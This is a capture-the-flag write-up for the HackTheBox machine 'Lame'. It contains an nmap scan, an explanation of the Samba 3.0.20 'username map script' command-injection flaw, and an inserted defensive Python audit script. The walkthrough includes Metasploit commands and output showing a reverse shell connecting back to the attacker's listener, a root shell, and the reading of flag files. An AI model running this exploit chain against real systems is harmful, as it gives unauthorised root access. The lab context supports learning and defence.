Lame (HTB)


OS: Linux
IP: 10.10.10.3
Machine Author: ch4p

Nmap :-

root@kali:~/Desktop# nmap -sS -A -O 10.10.10.3
Starting Nmap 7.50 ( https://nmap.org ) at 2017-12-16 18:17 EST
Nmap scan report for 10.10.10.3
Host is up (0.16s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Arris TG862G/CT cable modem (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.4.27 (92%), Linux 2.6.22 (92%), Linux 2.6.8 - 2.6.30 (92%), Dell iDRAC 6 remote access controller (Linux 2.6) (92%), Supermicro IPMI BMC (Linux 2.6.24) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2017-12-13T13:56:42-05:00
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 164.82 ms 10.10.*.*
2 164.95 ms 10.10.10.3
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 84.01 seconds


Vulnerability:- Samba 3.0.20


Vulnerability Description:- This module exploits a command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default “username map script” configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!
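
A defensive check for the condition described above, as an added example (not part of the original write-up or of the Metasploit module): it reports a host as exposed only when the Samba version is in the stated range and smb.conf actually sets "username map script". The function names and the sample smb.conf are constructed for illustration.

```python
import re

# Affected range as stated in the description: 3.0.20 .. 3.0.25rc3.
_VER = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:(pre|rc)(\d+))?")

def version_in_affected_range(banner):
    """True if the Samba version in `banner` is 3.0.20 .. 3.0.25rc3."""
    m = _VER.search(banner)
    if not m or (m.group(1), m.group(2)) != ("3", "0"):
        return False
    patch = int(m.group(3))
    if patch == 25 and m.group(4):
        # Assumption: "pre" builds precede the "rc" builds of 3.0.25.
        return m.group(4) == "pre" or int(m.group(5)) <= 3
    return 20 <= patch <= 24

def find_username_map_script(conf_text):
    """Return (section, value) for each non-empty 'username map script'."""
    hits, section, pending = [], None, ""
    for raw in conf_text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if line.endswith("\\"):            # smb.conf line continuation
            pending = line[:-1]
            continue
        if not line or line[0] in "#;":    # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        name, _, value = line.partition("=")
        # Samba ignores case and whitespace in parameter names.
        key = re.sub(r"\s+", "", name).lower()
        if key == "usernamemapscript" and value.strip():
            hits.append((section, value.strip()))
    return hits

def audit(banner, conf_text):
    """Exposed only if the version is affected AND the option is set."""
    affected = version_in_affected_range(banner)
    settings = find_username_map_script(conf_text)
    return {"affected_version": affected, "settings": settings,
            "exposed": affected and bool(settings)}

# Constructed sample config, not taken from the target in this write-up.
SAMPLE_CONF = """[global]
   workgroup = WORKGROUP
   ; username map script = /bin/false
   Username Map Script = /etc/samba/scripts/mapusers.sh
"""
```

Calling audit("Samba smbd 3.0.20-Debian", SAMPLE_CONF) marks the host as exposed; removing the option from smb.conf or running a version outside the stated range clears the finding.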


Exploit:- Samba “username map script” Command Execution

POC:-

msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf exploit(usermap_script) > exploit
[*] Started reverse TCP double handler on 10.10.*.*:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo UTiuwW6uLQ5WcJXz;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "UTiuwW6uLQ5WcJXz\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.*.*:4444 -> 10.10.10.3:57285) at 2017-12-16 22:55:59 -0500
id
uid=0(root) gid=0(root)

Now we have a non-interactive root shell. Upgrading it to a tty shell is optional, at least in this situation; after that we are good to go and read the user and root flags.

python -c 'import pty;pty.spawn("/bin/bash")'
root@lame:/# cd /home
cd /home
root@lame:/home# ls
ls
ftp makis service user
root@lame:/home# cd makis
cd makis
root@lame:/home/makis# ls
ls
user.txt
root@lame:/home/makis# cat user.txt
root@lame:/home/makis# cd /root
cd /root
root@lame:/root# ls
ls
Desktop reset_logs.sh root.txt vnc.log
root@lame:/root# cat root.txt

~ Hack the World and Stay Noob
